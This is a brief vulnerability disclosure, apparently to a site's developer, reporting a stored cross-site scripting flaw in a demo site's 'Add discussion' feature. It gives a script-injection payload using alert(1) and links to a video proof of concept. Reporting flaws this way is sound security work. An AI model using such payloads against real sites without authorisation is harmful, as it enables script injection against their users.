I tested the demo site you provided and I see that there is a stored XSS in the Add discussion function.
payload: thanh"><script>alert(1)</script>
video PoC: https://drive.google.com/file/d/1nsybTloKxd45a716hVFNOyxTrW4fbkry/view?usp=sharing